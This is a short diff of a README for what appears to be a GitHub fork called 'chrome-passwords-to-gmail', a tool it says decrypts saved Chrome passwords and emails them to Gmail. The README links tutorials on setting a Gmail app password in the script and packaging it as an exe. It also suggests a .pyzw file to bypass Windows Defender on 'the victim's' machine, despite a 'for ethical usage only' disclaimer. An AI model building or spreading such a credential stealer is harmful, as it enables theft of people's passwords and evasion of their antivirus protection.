coderMohammed1/chrome-passwords-to-gmail/README.md

 this fork will let you decrypt it and then it will send it to *Gmail* **for ethical usage only**!

-# see this to make app password and put it in the passd var in there:
+#helpers:
-https://www.youtube.com/watch?v=zxFXnLEmnb4&t=87s
+ see this to make app password and put it in the passd var in there: https://www.youtube.com/watch?v=zxFXnLEmnb4&t=87s

-# see this to conver it to exe:
+ see this to conver it to exe:
 https://youtu.be/bqNvkAfTvIc?si=q36wWrK3cZafE112

  OR you can make it **.pyzw** to bypass windef (but the victim must have py and the requirments installed to work this)